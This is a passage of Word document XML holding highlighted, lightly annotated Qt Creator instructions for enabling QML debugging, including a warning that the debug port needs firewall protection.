          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger Settings</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Projects</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mode</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>To debug Qt Quick Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Debugging is enabled by default for Qt 4.8, or later. For Qt 4.7, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Projects</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and then select the</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enable QML debugging and profiling</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>check box in the</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmake</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section in</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Build Steps</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="005E0A42" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You might have to compile the library first, by selecting the</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Compile</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>link.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qtcreator/images/qml-link-debugging-library.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1081" type="#_x0000_t75" alt="&quot;Build Steps&quot;" style="width:447.55pt;height:161.3pt">
            <v:imagedata r:id="rId3021" r:href="rId3022"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Debugging requires opening a socket at a well-known port, which presents a security risk. Anyone on the Internet could connect to the application that you are debugging and execute any JavaScript functions. Therefore, you must make sure that the port is properly protected by a </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu these risques</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger Settings</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section, select the</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enable QML</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>check box to enable QML debugging</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00747E01" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Build &gt; Rebuild Project</w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to clean and rebuild the project.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
